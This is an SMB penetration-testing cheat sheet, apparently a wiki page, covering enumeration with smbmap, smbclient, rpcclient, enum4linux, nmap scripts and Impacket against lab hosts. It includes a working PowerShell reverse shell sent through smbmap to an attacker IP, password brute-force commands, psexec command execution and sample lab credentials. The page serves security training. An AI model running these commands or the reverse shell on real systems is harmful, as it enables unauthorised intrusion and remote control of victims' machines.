Pentesting SMB

SMB Enumeration

The SMB is a network file sharing protocol that provides access to shared files and printers on a local network.
When clients and servers use different operating systems and SMB versions, the highest supported version will be used for communication.
SMB uses the following TCP and UDP ports:

Netbios-ns 137/tcp #NETBIOS Name Service
Netbios-ns 137/udp
netbios-dgm 138/tcp #NETBIOS Datagram Service
Netbios-dgm 138/udp
Netbios-ssn 139/tcp #NETBIOS session service
Netbios-ssn 139/udp
Microsoft-ds 445/tcp #if you are using active directory

SMB Checklist

Basic Commands
From SMB command line
View/Get Files

get services.txt
more services.txt

Enumerate Hostname

nmblookup -A $ip

List Shares

smbmap -H $ip
smbclient -L 10.129.101.197 -U Administrator
nmap --script smb-enum-shares -p 139,445 $ip

Connect to a listed share

smbclient \\\\10.129.101.197\\C$ -U Administrator
smbclient \\\\$ip\\[share name]

Check Null Sessions

smbmap -u anonymous -H 10.10.115.116
smbmap -H $ip
rpcclient -U "" -N $ip

With authentication

smbmap -u svc-admin -p management2005 -H 10.10.248.93

Check for Vulnerabilities

nmap --script smb-vuln* -p 139,445 $ip

Overall Scan

enum4linux -a $ip

Get a shell with smbmap (windows)

smbmap -u jsmith -p 'R33nisP!nckle' -d ABC -h 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'

Brute Force SMB

medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip  -vvvv

smbmap

smbmap is one of the best ways to enumerate samba. smbmap allows pen-testers to run commands(given proper permissions), download and upload files, and overall is just incredibly useful for smb enumeration.

smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig"

-s -> specify the share to enumerate
-d -> specify the domain to enumerate
--download -> downloads a file
--upload -> uploads a file

smbclient

List shares

smbclient -L 10.10.115.116

smbclient allows you to do most of the things you can do with smbmap, and it also offers you and interactive prompt.
-w -> specify the domain(workgroup) to use when connecting to the host
-I -> specify the ip address of the host
-c "ipconfig" -> would run the ipconfig command on the host
-U -> specify the username to authenticate with
-P -> specifies the password to authenticate with
-N -> tells smbclient to not use a password
get test -> would download the file named test
put /etc/hosts -> would put your /etc/hosts file on the target
Syntax:
To see which shares are available on a given host, run:

 /usr/bin/smbclient -L 10.10.10.10

For example, if you are trying to reach a directory that has been shared as 'public' on a machine called 10.10.10.10, the service would be called \10.10.10.10\public. -
However, due to shell restrictions, you will need to escape the backslashes, so you end up with something like this:

/usr/bin/smbclient \\\\10.10.10.10\\public mypasswd

To authenticate with a null sessions

smbmap -u 'root' -p '' -H 10.10.232.5 -x 'ip addr'

smbclient with domain credentials

smbclient -U 'RLAB\ngodfrey' -p 445 -L 127.0.0.1

rpcclient

A tool used for executing client-side MS-RPC functions. A null session in a connection with a samba or SMB server that does not require authentication with a password.

rpcclient -U "" [target ip address]

The -U option defines a null username, you will be asked for a password but leave it blank (hit enter!!!!)
The command line will change to the rpcclient context

rpcclient $>

To retrieve some general information about the server like the domain and number of users:

querydominfo

This command returns the domain, server, total users on the system and some other useful information.
Also shows the total number of user accounts and groups available on the target system.
To retrieve a list of users present on the system

enumdomusers

The result is a list of user accounts available on the system with the RID in hex. We can now use rpcclient to query the user info for more information:

lookupsids #convert SIDs to names
lookupsids S-1-5-21-3981879597-1135670737-2718083060-1002
lookupnames #convert names to SIDs
lookupnames Bill
queryuser 0x47f #get the user rid form enomdomusers command
queryusergroups 0x47b #use the rid for the username to see their group membership
querygroup 0x47c #when you get the group membership back use those rids for this query

enumprivs
found 35 privileges
SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege               0:36 (0x0:0x24)

Enumerate Privleges on the target box

getusername
Account Name: Guest, Authority Name: RELEVANT

Get username you are running as

queryuser [username]
username=pbx
queryuser pbx, queryuser 1000, queryuser 0x3e8

-This command will return information about the profile path on the server, the home drive, password related settings and a lot more.

To see an overview of all enumeration objects just type enum+tabx2.
If you get an error that says:

Cannot connect to server.  Error was NT_STATUS_CONNECTION_DISCONNECTED

Occurs because the minimum protocol version for smbclient has been set to SMB2_02
Fix with:

sudo vim /etc/samba/smb.conf

Add the following line to the config under the [global] section

client min protocol = CORE

Alternative method to enumdomusers is through RID cycling.
To determine the full SID we can run the: ‘lookupnames’ command and search for the domain with the following command:

lookupnames pbx

There are two sets of RIDS 500-1000 for system and 1000-10000 for Domain created users and groups.
If we append -500 to the SID and look it up using the lookupsids command we get the following output with the username:

rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-500
S-1-5-21-532510730-1394270290-3802288464-500 *unknown*\*unknown* (8)

Shows SID is unknown, increase by one

rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-501
S-1-5-21-532510730-1394270290-3802288464-501 PBX\nobody (1)

Find a valid user, increase the RID to 1000.

rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-1000
S-1-5-21-532510730-1394270290-3802288464-1000 PBX\pbx (1)

Have the full SID now

lookupsid.py Username Enumeration

Impacket’s lookupsid.py performs bruteforcing of Windows SID’s to identify users/groups on the remote target.
You need to be able to connect to IPC$ without authentication or with a known password and username

python3 lookupsid.py [email protected] | tee users.txt
Password:
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Brute forcing SIDs at 10.10.11.35
[*] StringBinding ncacn_np:10.10.11.35[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)

Enum4linux

Enum4linux is a linux alternative to enum.exe and it is used to enumerate data from windows or samba hosts.

enum4linux [target ip]

-Will auto RID cycle

Part of autorecon!
Recommend to > output to a text file for reference (its alot)

Nmap SMB scripts

ls -l /usr/share/nmap/scripts/smb*
nmap --script=[scriptname] [target ip]

For smb-os-discovery:

nmap -p 139,445 --script=smb-os-discovery [target ip]

First scans the target for all known SMB vulnerabilities
Second to see if target is vulnerable to EternalBlue

nmap -p 139,445 --script=smb-vuln* [target ip]
nmap -p 445 [target] --script=smb-vuln-ms17-010

Finding the Password Policy

Various ways to find a box's password policy

crackmapexec smb 10.10.10.161 --pass-pol
crackmapexec smb 10.10.10.161 --pass-pol -u '' -p ''
enum4linux 10.10.10.161

The reason this will sometimes not work is because when you install a new domain now null sessions will be disabled
However when a domain was upgraded from Windows 2000/2003/2008 they kept this feature on in order to have backwards compatibility

Impacket psexec command execution

psexec.py CICADA/emily.oscars:'Q!3@Lp#M6b*7t*Vt'@10.10.11.35 dir

PreviousPentesting Email NextPentesting Redis

Last updated 1 year ago